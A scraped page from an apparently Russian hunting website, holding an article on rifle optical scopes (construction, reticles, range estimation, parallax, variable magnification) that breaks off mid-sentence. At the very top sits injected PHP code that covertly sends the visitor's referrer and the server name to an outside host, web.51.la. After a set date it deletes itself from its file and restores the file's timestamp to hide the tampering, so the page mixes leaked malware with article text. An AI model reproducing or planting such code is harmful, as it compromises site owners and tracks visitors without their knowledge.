check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727465){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Важнейшее об оптическом прицеле

Заказать Охотничий тур или Сафари

Трофейная Охота

Охотничьи собаки

Найти на нашем сайте

Производственные Компании

Сейчас Онлайн

Сейчас 3070 гостей онлайн

Звоните и узнавайте места

текущего сезона охоты

Важнейшее об оптическом прицеле

Для чего нужен оптический прицел?

У обычного прицеливания, которое осуществляется с помощью прорези и мушки есть существенный недостаток. Поскольку глаз человека может «настраиваться» на предметы удаленные только на определенные расстояния, одновременно резко видеть прорезь мушку и цель невозможно принципиально. Вот эту проблему и решает оптический прицел, «собирая» на одной плоскости цель и прицельную марку. Кроме того, прицел увеличивает изображение цели, что делает стрельбу значительно более точной.

Конструкция прицела

На рисунке под текстом показана схема устройства прицела с переменным увеличением. 1- объектив, 2- прицельная марка, 3 – фокальная плоскость объектива, 4 – оборачивающая оптическая система, 5 – фокальная плоскость окуляра, 6 – окуляр. В фокальной плоскости объектива цель совмещается с прицельной маркой, но цель здесь находится вверх ногами. Оборачивающая система ставит цель с головы на ноги и формирует изображение цели и прицельной марки в плоскости окуляра. Резкость изображения может быть скорректирована специальной регулировкой. Удаление выходного зрачка Удаление выходного зрачка от окуляра в прицелах обычно находится около 8 мм. Это расстояние необходимо для того, чтобы при отдаче прицел не мог повредить лицо стрелка

Текст в рамочке

Прицелы со светящейся маркой. В германских федеральных землях различаются законы относительно сбыта и владения таких прицелов. Пожалуйста, читайте для этого больше на странице 5.

Варианты прицельных марок

Форма прицельной марки – дело вкуса стрелка. Наиболее часто встречающиеся марки показаны на рисунке. Расстояние между горизонтальными выравнивающими в большинстве марок равны семи тысячным долям дистанции. Это значит, что на дистанции 100 метров в разрыве между выравнивающими укладывается 70 см. В прицельных марках, обозначаемых 4а и 8, это расстояние вдвое больше. На 100 метров в их разрыве укладывается 140 см. Прицельная марка фирмы TASCO 30/30 очень близка к марке 8. Прицельная марка А, называемая в германии «Variabel» почти не отличается от марки 1 из прицелов Schmidt&Bender. B – «Diavari» почти точно такая, как марка 1 в цейссовском прицеле Diavari. Оценка расстояния до цели Размер средней косули от груди до зеркала бывает примерно 70 см. Если она в прицеле заполняет собой расстояние между выравнивающими, это означает, что расстояние до нее составляет 100 м. Конечно, если это обычные марки. Если в прицеле марки 4а или 8, и косуля умещается точно в разрыве, то до нее 50 метров. Если же олень, у которого длина тела около 140см, помещается в разрыве между выравнивающими, то это означает, что до него 200 м.

Параллакс

Ошибки прицеливания при параллаксе появляются, если прицельная марка не находится точно в фокальной плоскости, а глаз несколько сместился относительно центра выходного зрачка. В этом случае стрелку кажется, что цель по отношению прицельной марки перемещается. Если во время прицеливания глаз стрелка располагается точно напротив центра выходного зрачка прицела, никакой ошибки в стрельбе не произойдет. В общем, при стрельбе до 100 метров, ошибка связанная с возможным параллаксом, будет ничтожной.

Прицелы с изменяемой кратностью увеличения

Поскольку ситуации на охоте могут часто изменяться, были разработаны оптические прицелы с переменным увеличением. Это позволяет сначала при небольшом увеличении (широком поле зрения) обследовать местность, а затем, обнаружив цель, установить большое увеличение (узкое поле зрения) и сделать точный выстрел.

Прицельная марка в фокальной плоскости объектива или окуляра

В зависимости о того, в какой фокальной плоскости установлена прицельная марка, она либо изменяет свои размеры при изменении увеличения прицела или остается постоянного размера. Когда прицельная марка находится в фокальной плоскости окуляра, она при увеличении кратности остается постоянной толщины, при увеличении размера цели. Однако в этом случае нельзя использовать марку для оценки расстояния до цели.

Прицел из стали или легких сплавов.

Современные сплавы на основе легких металлов имеют прочность, равноценную стали. Корпуса из легких сплавов имеют постоянное преимущество перед стальными – они значительно легче. Кроме того, если и прицел, и кронштейн выполнены из одинакового легкого сплава, увеличиваются шансы не нарушить юстировку при

 

AddThis Social Bookmark Button
 

Добавить комментарий


Защитный код
Обновить